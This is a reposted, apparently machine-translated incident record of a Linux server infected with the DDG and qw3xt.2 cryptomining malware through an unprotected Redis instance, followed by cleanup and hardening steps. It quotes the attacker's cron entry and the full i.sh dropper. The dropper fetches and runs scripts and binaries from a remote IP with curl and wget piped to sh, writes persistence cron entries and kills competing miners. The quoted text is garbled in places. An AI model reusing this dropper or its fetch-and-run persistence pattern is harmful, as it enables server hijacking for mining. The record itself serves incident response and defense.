Linux server is implanted DDGs, qw3xt.2 mining virus processing records

Source: Internet
Author: User

Tags: csharp bin linu Service nan inux login effective http

The phenomenon after being invaded:

Found that there are qw3xt.2 and DDGs two abnormal processes, consuming a higher cpu,kill off after a while will be re-appear.

After killing the two exception processes, we see the following process over time:

The timed script is not found in/etc/sysconfig/crotnab first, and the timed task is found in the input crontab-e.

*/5 * * * * CURL-FSSL http://149.56.106.215:8000/i.sh | Sh
 Query the next 149.56.106.215 in the United States, the I.sh script content is as follows:  
Export path= $PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "" >/var/spool/cron/rootecho "*/15 * * * * Curl-fssl HTT p://149.56.106.215:8000/i.sh | SH ">>/var/spool/cron/rootecho" */15 * * * * WGET-Q-o-http://149.56.106.215:8000/i.sh | SH ">>/var/spool/cron/rootmkdir-p/var/spool/cron/crontabsecho" ">/var/spool/cron/crontabs/rootecho" */15 * * * * * CURL-FSSL http://149.56.106.215:8000/i.sh | SH ">>/var/spool/cron/crontabs/rootecho" */15 * * * * WGET-Q-o-http://149.56.106.215:8000/i.sh | SH ">>/var/spool/cron/crontabs/rootps auxf | Grep-v grep | grep/tmp/ddgs.3013 | | RM-RF/TMP/DDGS.3013IF [!-F "/tmp/ddgs.3013"]; Then Wget-q http://149.56.106.215:8000/static/3013/ddgs.$ (uname-m)-o/tmp/ddgs.3013 Curl-fssl http://149.56.106. 215:8000/static/3013/ddgs.$ (uname-m)-o/tmp/ddgs.3013fichmod +x/tmp/ddgs.3013 &&/tmp/ddgs.3013ps auxf | Grep-v grep | grep Circle_mi | awk ' {print $} ' | Xargs Killps AUXF | Grep-v grep | Grepget.bi-chi.com | awk ' {print $} ' | Xargs Killps AUXF | Grep-v grep | grep Hashvault.pro | awk ' {print $} ' | Xargs Killps AUXF | Grep-v grep | grep nanopool.org | awk ' {print $} ' | Xargs Killps AUXF | Grep-v grep | grep minexmr.com | awk ' {print $} ' | Xargs Killps AUXF | Grep-v grep | grep/boot/efi/| awk ' {print $} ' | Xargs Kill#ps AUXF | Grep-v grep | grep ddg.2006 | awk ' {print $} ' | Kill#ps AUXF | Grep-v grep | grep ddg.2010 | awk ' {print $} ' | Kill

Processing method:

1. Delete the CRONTAB-E

*/5 * * * * CURL-FSSL http://149.56.106.215:8000/i.sh | sh

2. Clear the password-free login content of the hacker set in/root/.ssh/authorized_keys

3. Modify the Redis password

4. Change the password of the root and login account

Security recommendations:

1. Configure the BIND option, limit the IP that can connect to the Redis server, modify the default port 6379 configuration authentication for Redis, that is, auth, set the password, and the password will be saved in the Redis configuration file in clear text

2. Configure the Rename-command configuration item "Rename_config" so that even if there is unauthorized access, it can make it more difficult for an attacker to use the CONFIG command

3. If you can block the Redis extranet in the firewall

Intrusion mode:

Collected relevant information to understand that it is using Redis vulnerability, not set password or password too simple, caused by intrusion. Specific ways can be referenced

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

Reids Change Password method as follows:

127.0. 0.1 6379  get requirepass # # Gets the current password set"yourpassword" # # set the current password, the service is restarted and will be the default, that is, no password;

The permanent effect method is to open the Redis profile redis.conf and find the Requirepass value to modify the password as follows:

Requirepass YourPassword  # # Note here that there must be no spaces before the line

Linux server is implanted DDGs, qw3xt.2 mining virus processing records

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

Tags Index: